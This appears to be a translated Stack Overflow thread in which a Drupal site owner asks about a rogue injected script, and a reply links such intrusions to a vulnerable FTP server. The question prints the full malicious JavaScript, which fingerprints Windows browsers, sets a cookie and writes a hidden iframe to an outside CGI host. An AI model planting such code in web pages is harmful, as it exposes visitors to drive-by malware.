6

可能重复:
奇怪的脚本出现在我网站的 DOM 中

我刚刚注意到我的网站 DOM 中运行了一个奇怪的脚本。我正在运行 DRUPAL。该脚本是http://www.103fm.net/release.js。我不知道从哪里开始寻找这个流氓脚本。我的网站是 miloads.com,它只出现在管理菜单中。奇怪的是该文件在 103fm.net 上不存在,但它实际上加载了以下脚本:

var BrowserDetect = {
init: function() {
this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version";
this.OS = this.searchString(this.dataOS) || "an unknown OS";
},
searchString: function(data) {
for (var i = 0; i < data.length; i++) {
var dataString = data[i].string;
var dataProp = data[i].prop;
this.versionSearchString = data[i].versionSearch || data[i].identity;
if (dataString) {
if (dataString.indexOf(data[i].subString) != -1)
return data[i].identity;
} else if (dataProp)
return data[i].identity;
}
},
searchVersion: function(dataString) {
var index = dataString.indexOf(this.versionSearchString);
if (index == -1)
return;
return parseFloat(dataString.substring(index + this.versionSearchString.length + 1));
},
dataBrowser: [{
string: navigator.userAgent,
subString: "Firefox",
identity: "Firefox"
}, {
string: navigator.userAgent,
subString: "MSIE",
identity: "Explorer",
versionSearch: "MSIE"
}],
dataOS: [{
string: navigator.platform,
subString: "Win",
identity: "Windows"
}]
};
function addCookie(szName, szValue, dtDaysExpires) {
var dtExpires = new Date();
var dtExpiryDate = "";
dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000);
dtExpiryDate = dtExpires.toGMTString();
document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate;
}
function findCookie(szName) {
var i = 0;
var nStartPosition = 0;
var nEndPosition = 0;
var szCookieString = document.cookie;
while (i <= szCookieString.length) {
nStartPosition = i;
nEndPosition = nStartPosition + szName.length;
if (szCookieString.substring(nStartPosition, nEndPosition) == szName) {
nStartPosition = nEndPosition + 1;
nEndPosition = document.cookie.indexOf(";", nStartPosition);
if (nEndPosition < nStartPosition)
nEndPosition = document.cookie.length;
return document.cookie.substring(nStartPosition, nEndPosition);
break;
}
i++;
}
return "";
}
BrowserDetect.init();
var szCookieString = document.cookie;
var stopit = BrowserDetect.browser;
var os = BrowserDetect.OS;
if (((stopit == "Firefox" || stopit == "Explorer") && (os == "Windows")) && (findCookie('geo_id2') != '753445')) {
addCookie("geo_id2", "753445", 1);
document.write("<if" + "rame name='info' src='http://www.ztanalytics.com/stat.cgi?s_id=1' width=1 height=1 scrolling=no frameborder=0></if" + "rame>");
} else {}
4

1 回答 1

1

同样,我们客户的服务器昨晚被罗马尼亚、捷克共和国和波兰的 IP 地址入侵。这些看似自动化的过程似乎在主体标签的顶部注入了一个脚本标签。该脚本似乎会在运行 Firefox 和 IE 的 Windows 机器上生成一个 cookie。然后它会打开一个 iframe 并运行在俄罗斯托管的站点上运行的 CGI 脚本。

幸运的是,最新版本的 Firefox 甚至不会加载脚本;然而,IE 确实如此。

Chrome(尽管没有受到影响)甚至不允许您访问发生这种情况的页面。

由于我能找到的所有报告都是最近发生的,这很可能是软件漏洞,而不是密码泄露 - 您正在运行什么 FTP 服务器(使用您的 FTP 客户端连接到服务器,控制台应该会告诉您)。有问题的服务器正在运行 ProFTPd 1.3.1。

如果该软件是通用的,则应通知创建者。

于 2012-04-20T11:31:08.880 回答